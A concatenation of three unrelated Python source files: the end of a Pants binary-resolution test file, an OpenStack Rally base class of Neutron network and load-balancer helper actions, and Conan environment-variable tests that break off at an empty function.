self.assertIn(BinaryUtil.MissingMachineInfo.__name__, the_raised_exception_message)
expected_msg = (
"Error resolving binary request BinaryRequest(supportdir='mysupportdir', version='myversion', "
# platform_dependent=False when doing select_script()
"name='myname', platform_dependent=False, external_url_generator=None, archiver=None): Pants "
"could not resolve binaries for the current host. Update --binaries-path-by-id to find "
"binaries for the current host platform ('linux', "
"'quantum_computer').\\n--binaries-path-by-id was:"
)
self.assertIn(expected_msg, the_raised_exception_message)
def test_select_binary_base_path_override(self):
def uname_func():
return "darwin", "dontcare1", "100.99", "dontcare2", "t1000"
binary_util = self._gen_binary_util(
uname_func=uname_func, path_by_id={("darwin", "100"): ["skynet", "42"]}
)
binary_request = binary_util._make_deprecated_binary_request(
"supportdir", "version", "name"
)
self.assertEqual(
"supportdir/skynet/42/version/name", binary_util._get_download_path(binary_request)
)
def test_external_url_generator(self):
binary_util = self._gen_binary_util(baseurls=[])
binary_request = BinaryRequest(
supportdir="supportdir",
version="version",
name="name",
platform_dependent=False,
external_url_generator=ExternalUrlGenerator(),
# TODO: test archiver!
archiver=None,
)
with self.assertRaises(BinaryUtil.BinaryResolutionError) as cm:
binary_util.select(binary_request)
the_raised_exception_message = str(cm.exception)
self.assertIn(BinaryToolFetcher.BinaryNotFound.__name__, the_raised_exception_message)
expected_msg = (
"Error resolving binary request BinaryRequest(supportdir='supportdir', version='version', "
"name='name', platform_dependent=False, "
"external_url_generator=ExternalUrlGenerator(<example __str__()>), archiver=None): "
"Failed to fetch name binary from any source: (Failed to fetch binary from "
"https://www.pantsbuild.org/some-binary: Fetch of https://www.pantsbuild.org/some-binary failed with "
"status code 404, Failed to fetch binary from https://www.pantsbuild.org/same-binary: Fetch of "
"https://www.pantsbuild.org/same-binary failed with status code 404)"
)
self.assertIn(expected_msg, the_raised_exception_message)
def test_disallowing_external_urls(self):
binary_util = self._gen_binary_util(baseurls=[], allow_external_binary_tool_downloads=False)
binary_request = binary_request = BinaryRequest(
supportdir="supportdir",
version="version",
name="name",
platform_dependent=False,
external_url_generator=ExternalUrlGenerator(),
# TODO: test archiver!
archiver=None,
)
with self.assertRaises(BinaryUtil.BinaryResolutionError) as cm:
binary_util.select(binary_request)
the_raised_exception_message = str(cm.exception)
self.assertIn(BinaryUtil.NoBaseUrlsError.__name__, the_raised_exception_message)
expected_msg = (
"Error resolving binary request BinaryRequest(supportdir='supportdir', version='version', "
"name='name', platform_dependent=False, "
"external_url_generator=ExternalUrlGenerator(<example __str__()>), archiver=None): "
"--binaries-baseurls is empty."
)
self.assertIn(expected_msg, the_raised_exception_message)
def test_select_argv(self):
"""Test invoking binary_util.py as a standalone script."""
with temporary_dir() as tmp_dir:
config_file_loc = os.path.join(tmp_dir, "pants.toml")
safe_file_dump(
config_file_loc,
payload=f"""\
[GLOBAL]
allow_external_binary_tool_downloads = true
pants_bootstrapdir = "{tmp_dir}"
""",
)
expected_output_glob = os.path.join(tmp_dir, "bin", "cmake", "*", "*", "3.9.5", "cmake")
with environment_as(PANTS_CONFIG_FILES=f"[{config_file_loc!r}]"):
# Ignore the first argument, as per sys.argv.
output_file = select(["_", "cmake", "3.9.5", "cmake.tar.gz"])
self.assertTrue(is_readable_dir(output_file))
realized_glob = assert_single_element(glob.glob(expected_output_glob))
self.assertEqual(os.path.realpath(output_file), os.path.realpath(realized_glob))
|
|
# Copyright 2014: Intel Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import random
from rally.common.i18n import _
from rally.common import logging
from rally import exceptions
from rally.plugins.openstack import scenario
from rally.plugins.openstack.wrappers import network as network_wrapper
from rally.task import atomic
LOG = logging.getLogger(__name__)
class NeutronScenario(scenario.OpenStackScenario):
"""Base class for Neutron scenarios with basic atomic actions."""
SUBNET_IP_VERSION = 4
# TODO(rkiran): modify in case LBaaS-v2 requires
LB_METHOD = "ROUND_ROBIN"
LB_PROTOCOL = "HTTP"
LB_PROTOCOL_PORT = 80
HM_TYPE = "PING"
HM_MAX_RETRIES = 3
HM_DELAY = 20
HM_TIMEOUT = 10
def _get_network_id(self, network, **kwargs):
"""Get Neutron network ID for the network name.
param network: str, network name/id
param kwargs: dict, network options
returns: str, Neutron network-id
"""
networks = self._list_networks(atomic_action=False)
for net in networks:
if (net["name"] == network) or (net["id"] == network):
return net["id"]
msg = (_("Network %s not found.") % network)
raise exceptions.NotFoundException(message=msg)
@atomic.action_timer("neutron.create_network")
def _create_network(self, network_create_args):
"""Create neutron network.
:param network_create_args: dict, POST /v2.0/networks request options
:returns: neutron network dict
"""
network_create_args["name"] = self.generate_random_name()
return self.clients("neutron").create_network(
{"network": network_create_args})
@atomic.optional_action_timer("neutron.list_networks")
def _list_networks(self, **kwargs):
"""Return user networks list.
:param atomic_action: True if this is an atomic action. added
and handled by the
optional_action_timer() decorator
:param kwargs: network list options
"""
return self.clients("neutron").list_networks(**kwargs)["networks"]
@atomic.action_timer("neutron.update_network")
def _update_network(self, network, network_update_args):
"""Update the network.
This atomic function updates the network with network_update_args.
:param network: Network object
:param network_update_args: dict, POST /v2.0/networks update options
:returns: updated neutron network dict
"""
network_update_args["name"] = self.generate_random_name()
body = {"network": network_update_args}
return self.clients("neutron").update_network(
network["network"]["id"], body)
@atomic.action_timer("neutron.delete_network")
def _delete_network(self, network):
"""Delete neutron network.
:param network: Network object
"""
self.clients("neutron").delete_network(network["id"])
@atomic.action_timer("neutron.create_subnet")
def _create_subnet(self, network, subnet_create_args, start_cidr=None):
"""Create neutron subnet.
:param network: neutron network dict
:param subnet_create_args: POST /v2.0/subnets request options
:returns: neutron subnet dict
"""
network_id = network["network"]["id"]
if not subnet_create_args.get("cidr"):
start_cidr = start_cidr or "10.2.0.0/24"
subnet_create_args["cidr"] = (
network_wrapper.generate_cidr(start_cidr=start_cidr))
subnet_create_args["network_id"] = network_id
subnet_create_args["name"] = self.generate_random_name()
subnet_create_args.setdefault("ip_version", self.SUBNET_IP_VERSION)
return self.clients("neutron").create_subnet(
{"subnet": subnet_create_args})
@atomic.action_timer("neutron.list_subnets")
def _list_subnets(self):
"""Returns user subnetworks list."""
return self.clients("neutron").list_subnets()["subnets"]
@atomic.action_timer("neutron.update_subnet")
def _update_subnet(self, subnet, subnet_update_args):
"""Update the neutron subnet.
This atomic function updates the subnet with subnet_update_args.
:param subnet: Subnet object
:param subnet_update_args: dict, PUT /v2.0/subnets update options
:returns: updated neutron subnet dict
"""
subnet_update_args["name"] = self.generate_random_name()
body = {"subnet": subnet_update_args}
return self.clients("neutron").update_subnet(
subnet["subnet"]["id"], body)
@atomic.action_timer("neutron.delete_subnet")
def _delete_subnet(self, subnet):
"""Delete neutron subnet
:param subnet: Subnet object
"""
self.clients("neutron").delete_subnet(subnet["subnet"]["id"])
@atomic.action_timer("neutron.create_router")
def _create_router(self, router_create_args, external_gw=False):
"""Create neutron router.
:param router_create_args: POST /v2.0/routers request options
:returns: neutron router dict
"""
router_create_args["name"] = self.generate_random_name()
if external_gw:
for network in self._list_networks():
if network.get("router:external"):
external_network = network
gw_info = {"network_id": external_network["id"],
"enable_snat": True}
router_create_args.setdefault("external_gateway_info",
gw_info)
return self.clients("neutron").create_router(
{"router": router_create_args})
@atomic.action_timer("neutron.list_routers")
def _list_routers(self):
"""Returns user routers list."""
return self.clients("neutron").list_routers()["routers"]
@atomic.action_timer("neutron.delete_router")
def _delete_router(self, router):
"""Delete neutron router
:param router: Router object
"""
self.clients("neutron").delete_router(router["router"]["id"])
@atomic.action_timer("neutron.update_router")
def _update_router(self, router, router_update_args):
"""Update the neutron router.
This atomic function updates the router with router_update_args.
:param router: dict, neutron router
:param router_update_args: dict, PUT /v2.0/routers update options
:returns: updated neutron router dict
"""
router_update_args["name"] = self.generate_random_name()
body = {"router": router_update_args}
return self.clients("neutron").update_router(
router["router"]["id"], body)
@atomic.action_timer("neutron.create_port")
def _create_port(self, network, port_create_args):
"""Create neutron port.
:param network: neutron network dict
:param port_create_args: POST /v2.0/ports request options
:returns: neutron port dict
"""
port_create_args["network_id"] = network["network"]["id"]
port_create_args["name"] = self.generate_random_name()
return self.clients("neutron").create_port({"port": port_create_args})
@atomic.action_timer("neutron.list_ports")
def _list_ports(self):
"""Return user ports list."""
return self.clients("neutron").list_ports()["ports"]
@atomic.action_timer("neutron.update_port")
def _update_port(self, port, port_update_args):
"""Update the neutron port.
This atomic function updates port with port_update_args.
:param port: dict, neutron port
:param port_update_args: dict, PUT /v2.0/ports update options
:returns: updated neutron port dict
"""
port_update_args["name"] = self.generate_random_name()
body = {"port": port_update_args}
return self.clients("neutron").update_port(port["port"]["id"], body)
@atomic.action_timer("neutron.delete_port")
def _delete_port(self, port):
"""Delete neutron port.
:param port: Port object
"""
self.clients("neutron").delete_port(port["port"]["id"])
@logging.log_deprecated_args(_("network_create_args is deprecated; "
"use the network context instead"),
"0.1.0", "network_create_args")
def _get_or_create_network(self, network_create_args=None):
"""Get a network from context, or create a new one.
This lets users either create networks with the 'network'
context, provide existing networks with the 'existing_network'
context, or let the scenario create a default network for
them. Running this without one of the network contexts is
deprecated.
:param network_create_args: Deprecated way to provide network
creation args; use the network
context instead.
:returns: Network dict
"""
if "networks" in self.context["tenant"]:
return {"network":
random.choice(self.context["tenant"]["networks"])}
else:
LOG.warning(_("Running this scenario without either the 'network' "
"or 'existing_network' context is deprecated"))
return self._create_network(network_create_args or {})
def _create_subnets(self, network,
subnet_create_args=None,
subnet_cidr_start=None,
subnets_per_network=1):
"""Create <count> new subnets in the given network.
:param network: network to create subnets in
:param subnet_create_args: dict, POST /v2.0/subnets request options
:param subnet_cidr_start: str, start value for subnets CIDR
:param subnets_per_network: int, number of subnets for one network
:returns: List of subnet dicts
"""
return [self._create_subnet(network, subnet_create_args or {},
subnet_cidr_start)
for i in range(subnets_per_network)]
def _create_network_and_subnets(self,
network_create_args=None,
subnet_create_args=None,
subnets_per_network=1,
subnet_cidr_start="1.0.0.0/24"):
"""Create network and subnets.
:parm network_create_args: dict, POST /v2.0/networks request options
:parm subnet_create_args: dict, POST /v2.0/subnets request options
:parm subnets_per_network: int, number of subnets for one network
:parm subnet_cidr_start: str, start value for subnets CIDR
:returns: tuple of result network and subnets list
"""
network = self._create_network(network_create_args or {})
subnets = self._create_subnets(network, subnet_create_args,
subnet_cidr_start, subnets_per_network)
return network, subnets
def _create_network_structure(self, network_create_args=None,
subnet_create_args=None,
subnet_cidr_start=None,
subnets_per_network=None,
router_create_args=None):
"""Create a network and a given number of subnets and routers.
:param network_create_args: dict, POST /v2.0/networks request options
:param subnet_create_args: dict, POST /v2.0/subnets request options
:param subnet_cidr_start: str, start value for subnets CIDR
:param subnets_per_network: int, number of subnets for one network
:param router_create_args: dict, POST /v2.0/routers request options
:returns: tuple of (network, subnets, routers)
"""
network = self._get_or_create_network(network_create_args)
subnets = self._create_subnets(network, subnet_create_args,
subnet_cidr_start,
subnets_per_network)
routers = []
for subnet in subnets:
router = self._create_router(router_create_args or {})
self._add_interface_router(subnet["subnet"],
router["router"])
routers.append(router)
return (network, subnets, routers)
@atomic.action_timer("neutron.add_interface_router")
def _add_interface_router(self, subnet, router):
"""Connect subnet to router.
:param subnet: dict, neutron subnet
:param router: dict, neutron router
"""
self.clients("neutron").add_interface_router(
router["id"], {"subnet_id": subnet["id"]})
@atomic.action_timer("neutron.remove_interface_router")
def _remove_interface_router(self, subnet, router):
"""Remove subnet from router
:param subnet: dict, neutron subnet
:param router: dict, neutron router
"""
self.clients("neutron").remove_interface_router(
router["id"], {"subnet_id": subnet["id"]})
@atomic.optional_action_timer("neutron.create_loadbalancer")
def _create_loadbalancer(self, subnet_id, **lb_create_args):
"""Create LB loadbalancer(v2)
:param subnet_id: str, neutron subnet-id
:param pool_create_args: dict, POST /lb/pools request options
:param atomic_action: True if this is an atomic action. added
and handled by the
optional_action_timer() decorator
:returns: dict, neutron lb pool
"""
args = {"name": self.generate_random_name(),
"vip_subnet_id": subnet_id}
args.update(lb_create_args)
return self.clients("neutron").create_loadbalancer({"loadbalancer": args})
def _create_v2_loadbalancer(self, networks, **lb_create_args):
"""Create LB loadbalancer(v2)
:param networks: list, neutron networks
:param pool_create_args: dict, POST /lb/pools request options
:returns: list, neutron lb pools
"""
subnets = []
lb = []
for net in networks:
subnets.extend(net.get("subnets", []))
with atomic.ActionTimer(self, "neutron.create_%s_lbs" %
len(subnets)):
for subnet_id in subnets:
lb.append(self._create_loadbalancer(
subnet_id, atomic_action=False, **lb_create_args))
return lb
@atomic.action_timer("neutron.delete_loadbalancer")
def _delete_v2_loadbalancer(self, lb):
"""Delete neutron vip.
:param vip: neutron Virtual IP object
"""
self.clients("neutron").delete_loadbalancer(lb)
@atomic.action_timer("neutron.create_listener")
def _create_v2_listener(self, lb, **listener_create_args):
"""Create Listener(lbaasv2)
:parm pool: dict, neutron lb-pool
:parm vip_create_args: dict, POST /lb/vips request options
:returns: dict, neutron lb vip
"""
args = {"protocol": self.LB_PROTOCOL,
"protocol_port": self.LB_PROTOCOL_PORT,
"name": self.generate_random_name(),
"loadbalancer_id": lb["loadbalancer"]["id"]}
args.update(listener_create_args)
return self.clients("neutron").create_listener({"listener": args})
@atomic.action_timer("neutron.delete_listener")
def _delete_v2_listener(self, listener):
"""Delete neutron vip.
:param vip: neutron Virtual IP object
"""
self.clients("neutron").delete_listener(listener)
@atomic.optional_action_timer("neutron.create_lbaas_pool")
def _create_v2_pool(self, listener, **pool_create_args):
"""Create LB pool(v2)
:param subnet_id: str, neutron subnet-id
:param pool_create_args: dict, POST /lb/pools request options
:param atomic_action: True if this is an atomic action. added
and handled by the
optional_action_timer() decorator
:returns: dict, neutron lb pool
"""
args = {"lb_algorithm": self.LB_METHOD,
"protocol": self.LB_PROTOCOL,
"name": self.generate_random_name(),
"listener_id": listener["listener"]["id"]}
args.update(pool_create_args)
return self.clients("neutron").create_lbaas_pool({"pool": args})
@atomic.action_timer("neutron.delete_listener")
def _delete_v2_pool(self, pool):
"""Delete loadbalancer pool.
:param vip: neutron Virtual IP object
"""
self.clients("neutron").delete_lbaas_pool(pool)
@atomic.optional_action_timer("neutron.create_lbaas_member")
def _create_v2_pool_member(self, subnet_id, pool, **mem_create_args):
"""Create LB pool member (v2)
:param subnet_id: str, neutron subnet-id
:param pool_create_args: dict, POST /lb/pools request options
:param atomic_action: True if this is an atomic action. added
and handled by the
optional_action_timer() decorator
:returns: dict, neutron lb pool
"""
args = {"subnet_id": subnet_id,
"protocol_port": self.LB_PROTOCOL_PORT}
args.update(mem_create_args)
return self.clients("neutron").create_lbaas_member(pool["pool"]["id"], {"member": args})
@atomic.action_timer("neutron.delete_pool_member")
def _delete_v2_pool_member(self, member, pool):
"""Delete lbaas pool member.
:param vip: neutron Virtual IP object
"""
self.clients("neutron").delete_lbaas_member(member, pool)
@atomic.optional_action_timer("neutron.create_pool")
def _create_lb_pool(self, subnet_id, **pool_create_args):
"""Create LB pool(v1)
:param subnet_id: str, neutron subnet-id
:param pool_create_args: dict, POST /lb/pools request options
:param atomic_action: True if this is an atomic action. added
and handled by the
optional_action_timer() decorator
:returns: dict, neutron lb pool
"""
args = {"lb_method": self.LB_METHOD,
"protocol": self.LB_PROTOCOL,
"name": self.generate_random_name(),
"subnet_id": subnet_id}
args.update(pool_create_args)
return self.clients("neutron").create_pool({"pool": args})
def _create_v1_pools(self, networks, **pool_create_args):
"""Create LB pools(v1)
:param networks: list, neutron networks
:param pool_create_args: dict, POST /lb/pools request options
:returns: list, neutron lb pools
"""
subnets = []
pools = []
for net in networks:
subnets.extend(net.get("subnets", []))
with atomic.ActionTimer(self, "neutron.create_%s_pools" %
len(subnets)):
for subnet_id in subnets:
pools.append(self._create_lb_pool(
subnet_id, atomic_action=False, **pool_create_args))
return pools
@atomic.action_timer("neutron.list_pools")
def _list_v1_pools(self, **kwargs):
"""Return user lb pool list(v1)."""
return self.clients("neutron").list_pools(**kwargs)
@atomic.action_timer("neutron.delete_pool")
def _delete_v1_pool(self, pool):
"""Delete neutron pool.
:param pool: Pool object
"""
self.clients("neutron").delete_pool(pool["id"])
@atomic.action_timer("neutron.update_pool")
def _update_v1_pool(self, pool, **pool_update_args):
"""Update pool.
This atomic function updates the pool with pool_update_args.
:param pool: Pool object
:param pool_update_args: dict, POST /lb/pools update options
:returns: updated neutron pool dict
"""
pool_update_args["name"] = self.generate_random_name()
body = {"pool": pool_update_args}
return self.clients("neutron").update_pool(pool["pool"]["id"], body)
def _create_v1_vip(self, pool, **vip_create_args):
"""Create VIP(v1)
:parm pool: dict, neutron lb-pool
:parm vip_create_args: dict, POST /lb/vips request options
:returns: dict, neutron lb vip
"""
args = {"protocol": self.LB_PROTOCOL,
"protocol_port": self.LB_PROTOCOL_PORT,
"name": self.generate_random_name(),
"pool_id": pool["pool"]["id"],
"subnet_id": pool["pool"]["subnet_id"]}
args.update(vip_create_args)
return self.clients("neutron").create_vip({"vip": args})
@atomic.action_timer("neutron.list_vips")
def _list_v1_vips(self, **kwargs):
"""Return user lb vip list(v1)."""
return self.clients("neutron").list_vips(**kwargs)
@atomic.action_timer("neutron.delete_vip")
def _delete_v1_vip(self, vip):
"""Delete neutron vip.
:param vip: neutron Virtual IP object
"""
self.clients("neutron").delete_vip(vip["id"])
@atomic.action_timer("neutron.update_vip")
def _update_v1_vip(self, vip, **vip_update_args):
"""Updates vip.
This atomic function updates vip name and admin state
:param vip: Vip object
:param vip_update_args: dict, POST /lb/vips update options
:returns: updated neutron vip dict
"""
vip_update_args["name"] = self.generate_random_name()
body = {"vip": vip_update_args}
return self.clients("neutron").update_vip(vip["vip"]["id"], body)
@atomic.action_timer("neutron.create_floating_ip")
def _create_floatingip(self, floating_network, **floating_ip_args):
"""Create floating IP with floating_network.
param: floating_network: str, external network to create floating IP
param: floating_ip_args: dict, POST /floatingips create options
returns: dict, neutron floating IP
"""
floating_network_id = self._get_network_id(
floating_network)
args = {"floating_network_id": floating_network_id}
args.update(floating_ip_args)
return self.clients("neutron").create_floatingip({"floatingip": args})
@atomic.action_timer("neutron.list_floating_ips")
def _list_floating_ips(self, **kwargs):
"""Return floating IPs list."""
return self.clients("neutron").list_floatingips(**kwargs)
@atomic.action_timer("neutron.delete_floating_ip")
def _delete_floating_ip(self, floating_ip):
"""Delete floating IP.
:param: dict, floating IP object
"""
return self.clients("neutron").delete_floatingip(floating_ip["id"])
@atomic.optional_action_timer("neutron.create_healthmonitor")
def _create_v1_healthmonitor(self, **healthmonitor_create_args):
"""Create LB healthmonitor.
This atomic function creates healthmonitor with the provided
healthmonitor_create_args.
:param atomic_action: True if this is an atomic action. added
and handled by the
optional_action_timer() decorator
:param healthmonitor_create_args: dict, POST /lb/healthmonitors
:returns: neutron healthmonitor dict
"""
args = {"type": self.HM_TYPE,
"delay": self.HM_DELAY,
"max_retries": self.HM_MAX_RETRIES,
"timeout": self.HM_TIMEOUT}
args.update(healthmonitor_create_args)
return self.clients("neutron").create_health_monitor(
{"health_monitor": args})
@atomic.action_timer("neutron.list_healthmonitors")
def _list_v1_healthmonitors(self, **kwargs):
"""List LB healthmonitors.
This atomic function lists all helthmonitors.
:param kwargs: optional parameters
:returns: neutron lb healthmonitor list
"""
return self.clients("neutron").list_health_monitors(**kwargs)
@atomic.action_timer("neutron.delete_healthmonitor")
def _delete_v1_healthmonitor(self, healthmonitor):
"""Delete neutron healthmonitor.
:param healthmonitor: neutron healthmonitor dict
"""
self.clients("neutron").delete_health_monitor(healthmonitor["id"])
@atomic.action_timer("neutron.update_healthmonitor")
def _update_v1_healthmonitor(self, healthmonitor,
**healthmonitor_update_args):
"""Update neutron healthmonitor.
:param healthmonitor: neutron lb healthmonitor dict
:param healthmonitor_update_args: POST /lb/healthmonitors
update options
:returns: updated neutron lb healthmonitor dict
"""
body = {"health_monitor": healthmonitor_update_args}
return self.clients("neutron").update_health_monitor(
healthmonitor["health_monitor"]["id"], body)
@atomic.action_timer("neutron.create_security_group")
def _create_security_group(self, **security_group_create_args):
"""Create Neutron security-group.
param: security_group_create_args: dict, POST /v2.0/security-groups
request options
return: dict, neutron security-group
"""
security_group_create_args["name"] = self.generate_random_name()
return self.clients("neutron").create_security_group(
{"security_group": security_group_create_args})
@atomic.action_timer("neutron.delete_security_group")
def _delete_security_group(self, security_group):
"""Delete Neutron security group.
param: security_group: dict, neutron security_group
"""
return self.clients("neutron").delete_security_group(
security_group["security_group"]["id"])
@atomic.action_timer("neutron.list_security_groups")
def _list_security_groups(self, **kwargs):
"""Return list of Neutron security groups."""
return self.clients("neutron").list_security_groups(**kwargs)
@atomic.action_timer("neutron.update_security_group")
def _update_security_group(self, security_group,
**security_group_update_args):
"""Update Neutron security-group.
param: security_group: dict, neutron security_group
param: security_group_update_args: dict, POST /v2.0/security-groups
update options
return: dict, updated neutron security-group
"""
security_group_update_args["name"] = self.generate_random_name()
body = {"security_group": security_group_update_args}
return self.clients("neutron").update_security_group(
security_group["security_group"]["id"], body)
|
|
import os
import platform
import subprocess
import textwrap
import pytest
from conan.tools.env.environment import environment_wrap_command
from conans.test.utils.tools import TestClient, GenConanfile
from conans.util.files import save
@pytest.fixture()
def client():
openssl = textwrap.dedent(r"""
import os
from conans import ConanFile
from conans.tools import save, chdir
class Pkg(ConanFile):
settings = "os"
def package(self):
with chdir(self.package_folder):
echo = "@echo off\necho MYOPENSSL={}!!".format(self.settings.os)
save("bin/myopenssl.bat", echo)
save("bin/myopenssl.sh", echo)
os.chmod("bin/myopenssl.sh", 0o777)
""")
cmake = textwrap.dedent(r"""
import os
from conans import ConanFile
from conans.tools import save, chdir
class Pkg(ConanFile):
settings = "os"
requires = "openssl/1.0"
def package(self):
with chdir(self.package_folder):
echo = "@echo off\necho MYCMAKE={}!!".format(self.settings.os)
save("mycmake.bat", echo + "\ncall myopenssl.bat")
save("mycmake.sh", echo + "\n myopenssl.sh")
os.chmod("mycmake.sh", 0o777)
def package_info(self):
# Custom buildenv not defined by cpp_info
self.buildenv_info.prepend_path("PATH", self.package_folder)
self.buildenv_info.define("MYCMAKEVAR", "MYCMAKEVALUE!!")
""")
gtest = textwrap.dedent(r"""
import os
from conans import ConanFile
from conans.tools import save, chdir
class Pkg(ConanFile):
settings = "os"
def package(self):
with chdir(self.package_folder):
prefix = "@echo off\n" if self.settings.os == "Windows" else ""
echo = "{}echo MYGTEST={}!!".format(prefix, self.settings.os)
save("bin/mygtest.bat", echo)
save("bin/mygtest.sh", echo)
os.chmod("bin/mygtest.sh", 0o777)
def package_info(self):
self.runenv_info.define("MYGTESTVAR", "MyGTestValue{}".format(self.settings.os))
""")
client = TestClient()
save(client.cache.new_config_path, "tools.env.virtualenv:auto_use=True")
client.save({"cmake/conanfile.py": cmake,
"gtest/conanfile.py": gtest,
"openssl/conanfile.py": openssl})
client.run("export openssl openssl/1.0@")
client.run("export cmake mycmake/1.0@")
client.run("export gtest mygtest/1.0@")
myrunner_bat = "@echo off\necho MYGTESTVAR=%MYGTESTVAR%!!\n"
myrunner_sh = "echo MYGTESTVAR=$MYGTESTVAR!!\n"
client.save({"myrunner.bat": myrunner_bat,
"myrunner.sh": myrunner_sh}, clean_first=True)
os.chmod(os.path.join(client.current_folder, "myrunner.sh"), 0o777)
return client
def test_complete(client):
conanfile = textwrap.dedent("""
import os
from conans import ConanFile
class Pkg(ConanFile):
requires = "openssl/1.0"
build_requires = "mycmake/1.0"
apply_env = False
def build_requirements(self):
self.build_requires("mygtest/1.0", force_host_context=True)
def build(self):
self.run("mycmake.bat", env="conanbuildenv")
assert os.path.exists(os.path.join(self.generators_folder, "conanrunenv.sh"))
""")
client.save({"conanfile.py": conanfile})
client.run("install . -s:b os=Windows -s:h os=Linux --build=missing")
# Run the BUILD environment
if platform.system() == "Windows":
cmd = environment_wrap_command("conanbuildenv", "mycmake.bat",
cwd=client.current_folder)
client.run_command(cmd)
assert "MYCMAKE=Windows!!" in client.out
assert "MYOPENSSL=Windows!!" in client.out
# Run the RUN environment
if platform.system() != "Windows":
cmd = environment_wrap_command("conanrunenv", "mygtest.sh && .{}myrunner.sh".format(os.sep),
cwd=client.current_folder)
client.run_command(cmd)
assert "MYGTEST=Linux!!" in client.out
assert "MYGTESTVAR=MyGTestValueLinux!!" in client.out
if platform.system() == "Windows":
client.run("build .")
assert "MYCMAKE=Windows!!" in client.out
assert "MYOPENSSL=Windows!!" in client.out
def test_profile_included_multiple():
client = TestClient()
conanfile = textwrap.dedent("""\
import os, platform
from conans import ConanFile
class Pkg(ConanFile):
def generate(self):
buildenv = self.buildenv.vars(self)
self.output.info("MYVAR1: {}!!!".format(buildenv.get("MYVAR1")))
self.output.info("MYVAR2: {}!!!".format(buildenv.get("MYVAR2")))
self.output.info("MYVAR3: {}!!!".format(buildenv.get("MYVAR3")))
""")
myprofile = textwrap.dedent("""
[buildenv]
MYVAR1=MyVal1
MYVAR3+=MyVal3
""")
other_profile = textwrap.dedent("""
[buildenv]
MYVAR1=MyValOther1
MYVAR2=MyValOther2
MYVAR3=MyValOther3
""")
client.save({"conanfile.py": conanfile,
"myprofile": myprofile,
"myprofile_include": "include(other_profile)\n" + myprofile,
"other_profile": other_profile})
# The reference profile has priority
client.run("install . -pr=myprofile_include")
assert "MYVAR1: MyVal1!!!" in client.out
assert "MYVAR2: MyValOther2!!!" in client.out
assert "MYVAR3: MyValOther3 MyVal3!!!" in client.out
# Equivalent to include is to put it first, then the last has priority
client.run("install . -pr=other_profile -pr=myprofile")
assert "MYVAR1: MyVal1!!!" in client.out
assert "MYVAR2: MyValOther2!!!" in client.out
assert "MYVAR3: MyValOther3 MyVal3!!!" in client.out
def test_profile_buildenv():
client = TestClient()
save(client.cache.new_config_path, "tools.env.virtualenv:auto_use=True")
conanfile = textwrap.dedent("""\
import os, platform
from conans import ConanFile
class Pkg(ConanFile):
def generate(self):
self.buildenv.vars(self).save_script("pkgenv")
if platform.system() != "Windows":
os.chmod("pkgenv.sh", 0o777)
""")
# Some scripts in a random system folders, path adding to the profile [env]
compiler_bat = "@echo off\necho MYCOMPILER!!\necho MYPATH=%PATH%"
compiler_sh = "echo MYCOMPILER!!\necho MYPATH=$PATH"
compiler2_bat = "@echo off\necho MYCOMPILER2!!\necho MYPATH2=%PATH%"
compiler2_sh = "echo MYCOMPILER2!!\necho MYPATH2=$PATH"
myprofile = textwrap.dedent("""
[buildenv]
PATH+=(path){}
mypkg*:PATH=!
mypkg*:PATH+=(path){}
""".format(os.path.join(client.current_folder, "compiler"),
os.path.join(client.current_folder, "compiler2")))
client.save({"conanfile.py": conanfile,
"myprofile": myprofile,
"compiler/mycompiler.bat": compiler_bat,
"compiler/mycompiler.sh": compiler_sh,
"compiler2/mycompiler.bat": compiler2_bat,
"compiler2/mycompiler.sh": compiler2_sh})
os.chmod(os.path.join(client.current_folder, "compiler", "mycompiler.sh"), 0o777)
os.chmod(os.path.join(client.current_folder, "compiler2", "mycompiler.sh"), 0o777)
client.run("install . -pr=myprofile")
# Run the BUILD environment
ext = "bat" if platform.system() == "Windows" else "sh" # TODO: Decide on logic .bat vs .sh
cmd = environment_wrap_command("conanbuildenv", "mycompiler.{}".format(ext),
cwd=client.current_folder)
client.run_command(cmd)
assert "MYCOMPILER!!" in client.out
assert "MYPATH=" in client.out
# Now with pkg-specific env-var
client.run("install . mypkg/1.0@ -pr=myprofile")
client.run_command(cmd)
assert "MYCOMPILER2!!" in client.out
assert "MYPATH2=" in client.out
def test_transitive_order():
gcc = textwrap.dedent(r"""
from conans import ConanFile
class Pkg(ConanFile):
def package_info(self):
self.runenv_info.append("MYVAR", "MyGCCValue")
""")
openssl = textwrap.dedent(r"""
from conans import ConanFile
class Pkg(ConanFile):
settings = "os"
build_requires = "gcc/1.0"
def package_info(self):
self.runenv_info.append("MYVAR", "MyOpenSSL{}Value".format(self.settings.os))
""")
cmake = textwrap.dedent(r"""
from conans import ConanFile
class Pkg(ConanFile):
requires = "openssl/1.0"
build_requires = "gcc/1.0"
def package_info(self):
self.runenv_info.append("MYVAR", "MyCMakeRunValue")
self.buildenv_info.append("MYVAR", "MyCMakeBuildValue")
""")
client = TestClient()
client.save({"gcc/conanfile.py": gcc,
"cmake/conanfile.py": cmake,
"openssl/conanfile.py": openssl})
client.run("export gcc gcc/1.0@")
client.run("export openssl openssl/1.0@")
client.run("export cmake cmake/1.0@")
consumer = textwrap.dedent(r"""
from conans import ConanFile
from conan.tools.env import VirtualBuildEnv, VirtualRunEnv
class Pkg(ConanFile):
requires = "openssl/1.0"
build_requires = "cmake/1.0", "gcc/1.0"
def generate(self):
buildenv = VirtualBuildEnv(self).vars()
self.output.info("BUILDENV: {}!!!".format(buildenv.get("MYVAR")))
runenv = VirtualRunEnv(self).vars()
self.output.info("RUNENV: {}!!!".format(runenv.get("MYVAR")))
""")
client.save({"conanfile.py": consumer}, clean_first=True)
client.run("install . -s:b os=Windows -s:h os=Linux --build")
assert "BUILDENV: MyGCCValue MyOpenSSLWindowsValue "\
"MyCMakeRunValue MyCMakeBuildValue!!!" in client.out
assert "RUNENV: MyOpenSSLLinuxValue!!!" in client.out
# Even if the generator is duplicated in command line (it used to fail due to bugs)
client.run("install . -s:b os=Windows -s:h os=Linux --build -g VirtualRunEnv -g VirtualBuildEnv")
assert "BUILDENV: MyGCCValue MyOpenSSLWindowsValue "\
"MyCMakeRunValue MyCMakeBuildValue!!!" in client.out
assert "RUNENV: MyOpenSSLLinuxValue!!!" in client.out
def test_buildenv_from_requires():
